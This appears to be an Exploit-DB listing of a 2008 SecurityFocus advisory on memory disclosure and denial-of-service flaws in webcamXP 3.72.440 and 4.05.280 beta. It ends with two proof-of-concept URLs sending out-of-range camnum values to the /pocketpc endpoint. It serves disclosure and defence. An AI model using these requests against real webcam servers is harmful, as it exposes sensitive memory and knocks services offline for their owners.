WebcamXP 3.72.440/4.05.280 Beta - '/pocketpc?camnum' Arbitrary Memory Disclosure

EDB-ID:

31233


Platform:

Multiple

Published:

2008-02-18

source: http://www.securityfocus.com/bid/27875/info

webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data.

Attackers can exploit these issues to access potentially sensitive information or crash the application. Successful exploits could aid in further attacks or deny service to legitimate users.

These issues affect webcamXP 3.72.440 and 4.05.280 beta and prior versions.

http://www.example.com:8080/pocketpc?camnum=999999&mode=0
http://www.example.com:8080/pocketpc?camnum=-999999&mode=0